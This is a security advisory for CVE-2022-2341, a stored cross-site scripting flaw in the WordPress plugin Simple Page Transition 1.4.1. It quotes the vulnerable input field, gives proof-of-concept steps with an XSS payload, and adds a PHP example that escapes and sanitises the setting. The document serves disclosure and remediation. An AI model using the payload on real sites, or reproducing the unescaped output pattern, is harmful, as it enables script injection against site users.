CVE-2022-2341: WordPress Simple Page Transition 1.4.1 Cross Site Scripting ≈ Packet Storm
The Simple Page Transition WordPress plugin through 1.4.1 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks when the unfiltered_html capability is disallowed (for example in a multisite setup).
# Exploit Title: WordPress Plugin ‘Simple Page Transition’ - Stored Cross-Site Scripting
# Date: 27-06-2022
# Exploit Author: Mariam Tariq - HunterSherlock
# Vendor Homepage: https://wordpress.org/plugins/simple-page-transition/
# Version: 1.4.1
# Tested on: Firefox
# Contact me: [email protected]

*#Vulnerable code*:

```
<label for="simple_page_transition_ignored"><?php _e( 'Ignored Download Links', 'spt' ); ?></label><br />
<input type="text" id="simple_page_transition_ignored" name="simple_page_transition_ignored" value="<?php print $simple_page_transition_ignored; ?>" /><br />
```

*#POC:*

1- Install the plugin ‘simple page transition’ & activate it.
2- Navigate towards the “ignored download links”
3- Enter the XSS payload `"><img src=x onerror=alert(1)>`

*#POC image:*

https://imgur.com/yzaTkhi
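The fix the description implies, sanitising the setting on save and escaping it on output, shown as an added example that is not the plugin's or the advisory author's code. The `spt_*` helper names and the sample values are hypothetical, and the two shims only stand in for WordPress's `esc_attr()` and `sanitize_text_field()` when the file is run outside WordPress.

```php
<?php
// Added example, not the plugin's code. Outside WordPress these shims stand in
// for the real esc_attr() / sanitize_text_field() so the file runs on its own.
if ( ! function_exists( 'esc_attr' ) ) {
    function esc_attr( $text ) {
        return htmlspecialchars( (string) $text, ENT_QUOTES, 'UTF-8' );
    }
}
if ( ! function_exists( 'sanitize_text_field' ) ) {
    function sanitize_text_field( $text ) {
        // Simplified stand-in: drop tags, collapse whitespace.
        return trim( preg_replace( '/\s+/', ' ', strip_tags( (string) $text ) ) );
    }
}

// Hypothetical helper: the value the settings save handler should store.
function spt_sanitize_ignored( $raw ) {
    return sanitize_text_field( $raw );
}

// Before: the field as the advisory shows it, with the value printed raw.
function spt_render_ignored_raw( $value ) {
    return '<input type="text" id="simple_page_transition_ignored" '
         . 'name="simple_page_transition_ignored" value="' . $value . '" />';
}

// After: the value is escaped for an HTML attribute context.
function spt_render_ignored_escaped( $value ) {
    return '<input type="text" id="simple_page_transition_ignored" '
         . 'name="simple_page_transition_ignored" value="' . esc_attr( $value ) . '" />';
}

// Count element start tags in the markup; more than one means the value
// closed the attribute and injected its own element.
function spt_count_tags( $html ) {
    return preg_match_all( '/<[a-z]/i', $html );
}

// Constructed samples: an ordinary setting value and the PoC string from the advisory.
$samples = array( 'pdf, zip', '"><img src=x onerror=alert(1)>' );
foreach ( $samples as $stored ) {
    printf( "stored: %s\n  raw:     %d tag(s)\n  escaped: %d tag(s)\n  on save: %s\n",
        $stored,
        spt_count_tags( spt_render_ignored_raw( $stored ) ),
        spt_count_tags( spt_render_ignored_escaped( $stored ) ),
        var_export( spt_sanitize_ignored( $stored ), true ) );
}
```

Escaping on output is the control that closes this field even for values already stored in the database; sanitising on save only protects values written after the fix.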